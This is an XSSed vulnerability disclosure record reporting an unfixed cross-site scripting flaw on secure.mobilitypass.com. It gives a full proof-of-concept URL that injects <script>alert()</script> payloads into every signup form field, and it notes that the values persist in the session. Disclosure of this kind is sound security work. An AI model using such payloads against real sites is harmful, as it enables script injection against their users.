Unfixed XSS vulnerability at secure.mobilitypass.com

2009-08-28T00:00:00
ID: XSSED:63851
Type: xssed
Reporter: Jelmer de Hen
Modified: 2010-05-24T00:00:00

Description

Security researcher Jelmer de Hen submitted, on 28/08/2009, a cross-site scripting (XSS) vulnerability affecting secure.mobilitypass.com, which at the time of submission ranked 729724 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 24/05/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: https://secure.mobilitypass.com/SignupForm?login="<script>alert(1)</script>&pass="<script>alert(2)</script>&voucher="<script>alert(3)</script>&fname="<script>alert(4)</script>&lname="<script>alert(5)</script>&email="<script>alert(6)</script>&email2="<script>alert(7)</script>&address="<script>alert(8)</script>&city="<script>alert(9)</script>&state="<script>alert(10)</script>&zip="<script>alert(11)</script>&mphone="<script>alert(12)</script>#The_site_will_store_some_variables_in_a_session_and_reuse_it_all_over_the_site_this_makes_it_that_some_of_the_xsses_will_trigger_again_after_revisiting_the_page